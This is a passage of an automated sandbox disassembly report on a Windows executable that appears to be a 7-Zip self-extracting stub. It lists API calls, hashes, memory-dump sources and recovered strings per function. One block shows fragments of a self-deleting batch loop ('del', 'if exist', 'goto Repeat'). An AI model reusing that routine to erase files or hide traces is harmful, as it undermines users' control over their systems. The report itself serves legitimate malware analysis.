                                              • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                              APIs
                                              • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                              • wsprintfW.USER32 ref: 00401FFD
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                              • GetLastError.KERNEL32 ref: 00402017
                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                              • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                              • GetLastError.KERNEL32 ref: 0040204C
                                              • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                              • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                              • SetLastError.KERNEL32(00000000), ref: 00402098
                                              • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                              • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                              • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                              • _wtol.MSVCRT ref: 0040212A
                                              • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                              • String ID: 7zSfxString%d$XpA$\3A
                                              • API String ID: 2117570002-3108448011
                                              • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                              • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                              • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                              • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                              • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                              • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                              • LockResource.KERNEL32(00000000), ref: 00401C41
                                              • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                              • wsprintfW.USER32 ref: 00401C95
                                              • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                              • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                              • API String ID: 2639302590-365843014
                                              • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                              • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                              • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                              • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                              APIs
                                              • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                              • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                              • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                              • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                              • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                              • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                              • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                              • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                              • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                              • String ID:
                                              • API String ID: 829399097-0
                                              • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                              • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                              • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                              • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                              • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                              • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                              • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                              • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                              • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                              • String ID:
                                              • API String ID: 1862581289-0
                                              • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                              • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                              • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                              • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                              APIs
                                              • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                              • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                              • GetWindow.USER32(?,00000005), ref: 00406D8F
                                              • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Window$AddressLibraryLoadProc
                                              • String ID: SetWindowTheme$\EA$uxtheme
                                              • API String ID: 324724604-1613512829
                                              • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                              • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                              • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                              • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                              • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                              • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                              • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                              • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                              • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                              • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                              • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                              • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                              • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                              • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                              • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                              APIs
                                              • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                              • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                              • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                              • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                              • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                              • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                              • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                              • API String ID: 3007203151-3467708659
                                              • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                              • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                              • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                              • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                              APIs
                                              • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                              • _wtol.MSVCRT ref: 004047DC
                                              • _wtol.MSVCRT ref: 004047F8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                              • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
                                              • API String ID: 2725485552-3187639848
                                              • Opcode ID: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                              • Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
                                              • Opcode Fuzzy Hash: 7a70c90a09e6339ceb99db9b5511794fba0efbdd365b8bdd8dc3dc4b6a1705ac
                                              • Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00402DF3
                                                • Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
                                                • Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,74DEE0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
                                                • Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
                                              • GetParent.USER32(?), ref: 00402E2E
                                              • LoadLibraryA.KERNEL32(riched20), ref: 00402E42
                                              • GetMenu.USER32(?), ref: 00402E55
                                              • SetThreadLocale.KERNEL32(00000419), ref: 00402E62
                                              • CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
                                              • DestroyWindow.USER32(?), ref: 00402EA3
                                              • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
                                              • GetSysColor.USER32(0000000F), ref: 00402EBC
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
                                              • SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                              • String ID: RichEdit20W$STATIC$riched20${\rtf
                                              • API String ID: 1731037045-2281146334
                                              • Opcode ID: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                              • Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
                                              • Opcode Fuzzy Hash: 2b38b22499d69b5ca28c01525db5cb238b78fd2564d1ef548c56061806c72a13
                                              • Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68
                                              APIs
                                              • GetWindowDC.USER32(00000000), ref: 00401CD4
                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                              • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                              • GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                              • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                              • CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                              • CreateCompatibleDC.GDI32(?), ref: 00401D52
                                              • SelectObject.GDI32(00000000,?), ref: 00401D60
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                              • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                              • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                              • GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                              • SelectObject.GDI32(00000000,?), ref: 00401DB3
                                              • SelectObject.GDI32(00000000,?), ref: 00401DB9
                                              • DeleteDC.GDI32(00000000), ref: 00401DC2
                                              • DeleteDC.GDI32(00000000), ref: 00401DC5
                                              • ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                              • ReleaseDC.USER32(00000000,?), ref: 00401DDB
                                              • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
